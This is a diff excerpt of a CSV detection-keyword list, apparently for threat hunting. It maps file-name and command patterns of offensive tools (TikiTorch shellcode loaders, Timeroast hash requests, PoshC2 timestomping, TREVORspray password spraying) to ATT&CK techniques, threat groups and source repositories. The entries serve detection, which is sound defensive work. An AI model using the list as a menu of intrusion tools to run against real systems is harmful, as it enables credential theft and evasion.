+"*TikiLoader.*","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - 
T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rkervella/CarbonMonoxide","1","1","N/A","10","10","21","12","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z"
+"*TikiLoader.dll*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - 
LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z"
+"*TikiLoader.dll*","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rkervella/CarbonMonoxide","1","1","N/A","10","10","21","12","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z"
+"*TikiLoader.Injector*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z"
+"*TikiLoader\TikiLoader*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","0","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z"
+"*TikiSpawn.dll*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z"
+"*TikiSpawn.exe*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z"
+"*TikiSpawn.ps1*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z"
+"*TikiSpawnAs*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z"
+"*TikiSpawnAsAdmin*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z"
+"*TikiSpawnElevated*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z"
+"*TikiSpawnWOppid*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z"
+"*TikiSpawnWppid*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z"
+"*TikiTorch.exe*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z"
+"*TikiVader.*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z"
+"*timemachine_cmd_injection*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*timeroast.ps1*","offensive_tool_keyword","Timeroast","Timeroasting takes advantage of Windows NTP authentication mechanism allowing unauthenticated attackers to effectively request a password hash of any computer or trust account by sending an NTP request with that account's RID","T1558.003 - T1059.003 - T1078.004","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/SecuraBV/Timeroast","1","1","N/A","10","2","152","16","2023-07-04T07:12:57Z","2023-01-18T09:04:05Z"
+"*timeroast.py*","offensive_tool_keyword","Timeroast","Timeroasting takes advantage of Windows NTP authentication mechanism allowing unauthenticated attackers to effectively request a password hash of any computer or trust account by sending an NTP request with that account's RID","T1558.003 - T1059.003 - T1078.004","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/SecuraBV/Timeroast","1","1","N/A","10","2","152","16","2023-07-04T07:12:57Z","2023-01-18T09:04:05Z"
+"*timestomp c:*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - 
TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
+"*timing_attack * --brute-force*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*timwhitez/Doge-Loader*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Loader by Golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/timwhitez/Doge-Loader","1","1","N/A","10","10","277","61","2021-04-22T08:24:59Z","2020-10-09T04:47:54Z"
+"*TlRMTVNTUAABAAAABYIIAAAAAAAAAAAAAAAAAAAAAAAAAAAAMAAAAAAAAAAwAAAA*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever 
proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","ntlm decoder","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z"
